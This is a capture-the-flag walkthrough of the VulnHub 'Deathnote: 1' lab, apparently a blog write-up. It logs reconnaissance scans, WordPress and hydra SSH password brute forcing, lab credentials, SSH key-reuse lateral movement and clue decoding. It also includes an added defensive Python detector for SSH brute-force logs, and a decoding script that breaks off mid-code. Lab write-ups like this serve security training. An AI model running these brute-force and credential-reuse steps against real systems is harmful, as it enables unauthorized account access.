Deathnotes
Author: jason_huawen
Target machine information
Name: Deathnote: 1
URL:
https://www.vulnhub.com/entry/deathnote-1,739/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:a6:91:71 1 60 PCS Systemtechnik GmbH
192.168.56.205 08:00:27:6a:7a:fa 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.205.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.205 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-16 08:09 EST
Nmap scan report for 192.168.56.205
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5eb8ff2dacc7e93c992f3bfcda5ca353 (RSA)
| 256 a8f3819d0adc169a49eebc24e4655ca6 (ECDSA)
|_ 256 4f20c32d19755be81f320175c2709a7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:6A:7A:FA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.03 seconds
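The Nmap scan results show that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).
Getting a shell
When the browser accesses port 80, it is redirected to deathnote.vuln, so add that name to the /etc/hosts file.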
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.205 deathnote.vuln
After refreshing the page, there is a link: HINT, Find a notes.txt file on server
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ nikto -h http://deathnote.vuln/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.205
+ Target Hostname: deathnote.vuln
+ Target Port: 80
+ Start Time: 2023-01-16 08:44:10 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: c5, size: 5cb285991624e, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7785 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-01-16 08:44:57 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ nikto -h http://deathnote.vuln/wordpress/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.205
+ Target Hostname: deathnote.vuln
+ Target Port: 80
+ Start Time: 2023-01-16 08:45:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://deathnote.vuln/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wordpress/wp-login.php: Wordpress login found
+ 7785 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-01-16 08:45:57 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/16 08:46:25 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
/manual (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/server-status (Status: 403) [Size: 279]
Progress: 216128 / 220561 (97.99%)===============================================================
2023/01/16 08:46:47 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,sh,html
[+] Timeout: 10s
===============================================================
2023/01/16 08:47:02 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 197]
/.html (Status: 403) [Size: 279]
/wordpress (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
/manual (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/robots.txt (Status: 200) [Size: 68]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101050 / 1102805 (99.84%)===============================================================
2023/01/16 08:48:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/wordpress/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,sh,html
[+] Timeout: 10s
===============================================================
2023/01/16 08:49:11 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 301) [Size: 0] [--> http://deathnote.vuln/wordpress/]
/wp-content (Status: 301) [Size: 331] [--> http://deathnote.vuln/wordpress/wp-content/]
/wp-login.php (Status: 200) [Size: 6799]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 332] [--> http://deathnote.vuln/wordpress/wp-includes/]
/readme.html (Status: 200) [Size: 7346]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 329] [--> http://deathnote.vuln/wordpress/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/wp-signup.php (Status: 302) [Size: 0] [--> http://deathnote.vuln/wordpress/wp-login.php?action=register]
Progress: 1100068 / 1102805 (99.75%)===============================================================
2023/01/16 08:51:15 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ wpscan --url http://deathnote.vuln/wordpress -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://deathnote.vuln/wordpress/ [192.168.56.205]
[+] Started: Mon Jan 16 08:52:43 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://deathnote.vuln/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://deathnote.vuln/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://deathnote.vuln/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
| Found By: Rss Generator (Passive Detection)
| - http://deathnote.vuln/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.8</generator>
| - http://deathnote.vuln/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.7
| Style URL: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] kira
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://deathnote.vuln/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Jan 16 08:52:46 2023
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 14.702 KB
[+] Data Received: 444.821 KB
[+] Memory used: 234.879 MB
[+] Elapsed time: 00:00:03
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ wpscan --url http://deathnote.vuln/wordpress -U kira -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
The password was not cracked.
Note: these resources cannot be accessed with the browser; use curl or wget to fetch them instead.
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ curl http://deathnote.vuln/robots.txt
fuck it my dad
added hint on /important.jpg
ryuk please delete it
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ wget http://deathnote.vuln/important.jpg
--2023-01-16 09:13:29-- http://deathnote.vuln/important.jpg
Resolving deathnote.vuln (deathnote.vuln)... 192.168.56.205
Connecting to deathnote.vuln (deathnote.vuln)|192.168.56.205|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 277 [image/jpeg]
Saving to: ‘important.jpg’
important.jpg 100%[====================================================>] 277 --.-KB/s in 0s
2023-01-16 09:13:29 (78.8 MB/s) - ‘important.jpg’ saved [277/277]
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ ls -alh
total 16K
drwxr-xr-x 2 kali kali 4.0K Jan 16 09:13 .
drwxr-xr-x 24 kali kali 4.0K Jan 16 08:07 ..
-rw-r--r-- 1 kali kali 277 Aug 29 2021 important.jpg
-rw-r--r-- 1 root root 939 Jan 16 08:09 nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ steghide extract -sf important.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ stegseek important.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: the file format of the file "important.jpg" is not supported.
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ binwalk -e important.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ ls
important.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ file important.jpg
important.jpg: ASCII text
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ cat important.jpg
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira
i can only help you by giving something important
login username : user.txt
i don't know the password.
find it by yourself
but i think it is in the hint section of site
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$
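Although important.jpg has a .jpg extension, it is actually a text file.
The password is in the Hint section, so it should be: ## iamjustic3
So the username is kira. After logging in to the WordPress admin backend, shell.php cannot be uploaded directly by replacing the 404 template.
A notes.txt file was found in Media; its URL is: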
http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
It is a password wordlist. Use it to brute-force the user kira and the user L that appears on the web page.
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ hydra -l kira -P dict ssh://192.168.56.205
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 09:22:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://192.168.56.205:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-16 09:22:39
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ hydra -l L -P dict ssh://192.168.56.205
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 09:22:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://192.168.56.205:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-16 09:22:58
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ hydra -l l -P dict ssh://192.168.56.205
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 09:23:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://192.168.56.205:22/
[22][ssh] host: 192.168.56.205 login: l password: death4me
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-16 09:23:12
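Seen from the target's side, the hydra runs above produce a burst of failed SSH logins from one address, ending in a success. The following added example (not part of the original write-up) flags that pattern in sshd log lines; the log lines, the source address 192.168.56.101, the PIDs and the ports are constructed sample data, and the threshold and window are assumptions to tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the syslog format sshd uses for password auth.
SAMPLE_AUTH_LOG = """\
Jan 16 09:23:04 deathnote sshd[1501]: Failed password for invalid user L from 192.168.56.101 port 40100 ssh2
Jan 16 09:23:05 deathnote sshd[1502]: Failed password for l from 192.168.56.101 port 40102 ssh2
Jan 16 09:23:05 deathnote sshd[1503]: Failed password for l from 192.168.56.101 port 40104 ssh2
Jan 16 09:23:06 deathnote sshd[1504]: Failed password for l from 192.168.56.101 port 40106 ssh2
Jan 16 09:23:06 deathnote sshd[1505]: Failed password for l from 192.168.56.101 port 40108 ssh2
Jan 16 09:23:07 deathnote sshd[1506]: Failed password for l from 192.168.56.101 port 40110 ssh2
Jan 16 09:23:08 deathnote sshd[1507]: Accepted password for l from 192.168.56.101 port 40112 ssh2
Jan 16 09:41:30 deathnote sshd[1620]: Failed password for kira from 192.168.56.10 port 51514 ssh2
Jan 16 09:41:39 deathnote sshd[1620]: Accepted password for kira from 192.168.56.10 port 51514 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def detect(log_text, year=2023, threshold=5, window=timedelta(seconds=60)):
    """Return alerts as (kind, source_ip, user) tuples, in log order.

    Syslog timestamps carry no year, so the caller supplies one.
    """
    recent = defaultdict(deque)   # source ip -> timestamps of recent failures
    bursting = set()              # ips already reported for the current burst
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        fails = recent[ip]
        while fails and ts - fails[0] > window:   # drop failures outside the window
            fails.popleft()
        if not fails:
            bursting.discard(ip)                  # burst is over, allow a new alert
        if m["result"] == "Failed":
            fails.append(ts)
            if len(fails) >= threshold and ip not in bursting:
                bursting.add(ip)
                alerts.append(("bruteforce", ip, user))
        elif len(fails) >= threshold:
            # A login that succeeds right after a burst of failures from the
            # same source means a guessed password, not a typo.
            alerts.append(("success_after_bruteforce", ip, user))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG):
        print(alert)
```

The single mistyped password from 192.168.56.10 stays below the threshold and raises nothing; the success_after_bruteforce alert is the one that means the account's password should be treated as known.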
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ ssh l@192.168.56.205
The authenticity of host '192.168.56.205 (192.168.56.205)' can't be established.
ED25519 key fingerprint is SHA256:Pj7G++7sat/zpoeFTsy5FUba1luVvaIo7NG0PdXzxY8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.205' (ED25519) to the list of known hosts.
l@192.168.56.205's password:
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:12:29 2021 from 192.168.1.6
l@deathnote:~$ id
uid=1000(l) gid=1000(l) groups=1000(l),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
l@deathnote:~$ sudo -l
[sudo] password for l:
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$ ls -alh
total 36K
drwxr-xr-x 4 l l 4.0K Sep 4 2021 .
drwxr-xr-x 4 root root 4.0K Jul 19 2021 ..
-rw------- 1 l l 3 Sep 4 2021 .bash_history
-rw-r--r-- 1 l l 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 l l 3.5K Jul 19 2021 .bashrc
drwxr-xr-x 3 l l 4.0K Jul 19 2021 .local
-rw-r--r-- 1 l l 807 Jul 19 2021 .profile
drwx------ 2 l l 4.0K Sep 4 2021 .ssh
-rw-r--r-- 1 root root 512 Jul 19 2021 user.txt
l@deathnote:~$ cat user.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.
l@deathnote:~$
This is Brainfuck code, which decodes to:
i think u got the shell , but you wont be able to kill me -kira
l@deathnote:/home/kira$ cd .ssh
l@deathnote:/home/kira/.ssh$ ls -alh
total 12K
drwxr-xr-x 2 kira kira 4.0K Jul 19 2021 .
drwxr-xr-x 4 kira kira 4.0K Sep 4 2021 ..
-rw-r--r-- 1 kira kira 393 Jul 19 2021 authorized_keys
l@deathnote:/home/kira/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote
l@deathnote:/home/kira/.ssh$ ssh kira@127.0.0.1
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:00:09 2021 from 127.0.0.1
kira@deathnote:~$
kira@deathnote:~$ cat kira.txt
cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp
kira@deathnote:~$
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ echo 'cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp' | base64 -d
please protect one of the following
1. L (/opt)
2. Misa (/var)
kira@deathnote:~$ cd /opt
kira@deathnote:/opt$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 29 2021 .
drwxr-xr-x 18 root root 4.0K Jul 19 2021 ..
drwxr-xr-x 4 root root 4.0K Aug 29 2021 L
kira@deathnote:/opt$ cd L
kira@deathnote:/opt/L$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Aug 29 2021 .
drwxr-xr-x 3 root root 4.0K Aug 29 2021 ..
drwxr-xr-x 2 root root 4.0K Aug 29 2021 fake-notebook-rule
drwxr-xr-x 2 root root 4.0K Aug 29 2021 kira-case
kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -alh
total 16K
drwxr-xr-x 2 root root 4.0K Aug 29 2021 .
drwxr-xr-x 4 root root 4.0K Aug 29 2021 ..
-rw-r--r-- 1 root root 84 Aug 29 2021 case.wav
-rw-r--r-- 1 root root 15 Aug 29 2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$ cat hint
use cyberchef
kira@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
kira@deathnote:/opt/L/fake-notebook-rule$ cd ..
kira@deathnote:/opt/L$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Aug 29 2021 .
drwxr-xr-x 3 root root 4.0K Aug 29 2021 ..
drwxr-xr-x 2 root root 4.0K Aug 29 2021 fake-notebook-rule
drwxr-xr-x 2 root root 4.0K Aug 29 2021 kira-case
kira@deathnote:/opt/L$ cd kira-case/
kira@deathnote:/opt/L/kira-case$ ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Aug 29 2021 .
drwxr-xr-x 4 root root 4.0K Aug 29 2021 ..
-rw-r--r-- 1 root root 295 Aug 29 2021 case-file.txt
kira@deathnote:/opt/L/kira-case$ cat case-file.txt
the FBI agent died on December 27, 2006
1 week after the investigation of the task-force member/head.
aka.....
Soichiro Yagami's family .
hmmmmmmmmm......
and according to watari ,
he died as other died after Kira targeted them .
and we also found something in
fake-notebook-rule folder .
kira@deathnote:/opt/L/kira-case$
Following the hint, decoding with CyberChef gives: passwd : kiraisevil
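case.wav is hex-encoded Base64, and kira.txt earlier is plain Base64. As an added example (not part of the original write-up, and a local stand-in for the CyberChef step rather than CyberChef itself), the following peels such layers until the text no longer decodes to printable ASCII; the function names are chosen here.

```python
import base64
import binascii
import re

# Values copied from the terminal output above.
CASE_WAV = ("63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 "
            "6c 7a 5a 58 5a 70 62 43 41 3d")
KIRA_TXT = ("cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQp"
            "CjIuIE1pc2EgKC92YXIp")


def _printable(data):
    """True if data is non-empty ASCII text (tab, LF, CR or 0x20..0x7e)."""
    return bool(data) and all(b in (9, 10, 13) or 32 <= b < 127 for b in data)


def try_hex(text):
    compact = re.sub(r"\s+", "", text)
    if len(compact) < 4 or len(compact) % 2:
        return None
    if not re.fullmatch(r"[0-9a-fA-F]+", compact):
        return None
    return bytes.fromhex(compact)


def try_base64(text):
    compact = re.sub(r"\s+", "", text)
    if len(compact) < 8 or len(compact) % 4:
        return None
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except binascii.Error:
        return None


def peel(text, max_layers=8):
    """Strip hex/Base64 layers; return (layer names in order, final text).

    A layer is accepted only if it decodes to printable ASCII, which keeps
    ordinary words that happen to fit an alphabet from being "decoded"
    into garbage. Hex is tried first because hex digits are also valid
    Base64 characters.
    """
    layers = []
    for _ in range(max_layers):
        for name, decoder in (("hex", try_hex), ("base64", try_base64)):
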